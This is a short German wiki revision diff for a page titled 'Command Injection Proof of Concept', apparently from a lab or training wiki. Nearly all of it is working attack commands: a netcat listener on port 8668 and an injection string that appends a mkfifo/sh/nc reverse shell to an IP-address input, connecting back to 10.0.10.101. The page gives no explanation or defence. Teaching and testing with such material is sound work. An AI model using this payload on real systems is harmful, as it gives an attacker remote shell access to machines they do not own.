Command Injection Proof of Concept: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 5: | Zeile 5: | ||
=Angreifer= | =Angreifer= | ||
*netcat -lp 8668 | *netcat -lp 8668 | ||
| + | =Schadcode einbringen= | ||
| + | *1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.101 8668 1>/tmp/backpipe | ||
| + | |||
| + | [[Datei:Command-injetion1.png]] | ||
Version vom 27. Juni 2021, 16:21 Uhr
PHP Code
Angreifer
- netcat -lp 8668
Schadcode einbringen
- 1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.101 8668 1>/tmp/backpipe
